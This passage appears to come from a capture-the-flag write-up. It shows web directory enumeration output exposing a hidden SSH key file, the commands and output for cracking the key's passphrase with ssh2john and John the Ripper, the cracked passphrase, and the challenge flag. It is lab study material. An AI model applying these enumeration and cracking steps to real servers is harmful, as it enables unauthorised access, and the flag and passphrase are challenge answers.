/.hta                 (Status: 403) [Size: 275]
/.hta.php             (Status: 403) [Size: 275]
/.hta.html            (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/.htpasswd.txt        (Status: 403) [Size: 275]
/.htaccess.txt        (Status: 403) [Size: 275]
/.htpasswd.php        (Status: 403) [Size: 275]
/.htaccess.php        (Status: 403) [Size: 275]
/.htpasswd.html       (Status: 403) [Size: 275]
/.htaccess.html       (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 4173]
/index.html           (Status: 200) [Size: 4173]
/s3cr3t               (Status: 200) [Size: 63]
/ryuk.apples          (Status: 200) [Size: 1766]
/robots.txt           (Status: 200) [Size: 17]
/robots.txt           (Status: 200) [Size: 17]
/robots.txt           (Status: 200) [Size: 17]
/server-status        (Status: 403) [Size: 275]
===============================================================
2021/08/08 02:43:02 Finished
===============================================================
```
s3cr3t
ryuk.apples
Next, crack the SSH key:
```text
/usr/share/john/ssh2john.py ryuk.apples > hash
┌──(kali㉿kali)-[~/Desktop/thm/aa]
└─$ john --wordlist=wordlist.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
l1ght1skir4      (ryuk.apples)
1g 0:00:00:00 DONE (2021-08-08 02:44) 100.0g/s 461400p/s 461400c/s 461400C/s zone..zt
Session completed
```
Overall this is much the same as the first approach.
```text
BSNoida{Pr1vEsc_w4a_E4sy_P3a5y}
```
Reference link 1
Reference link 2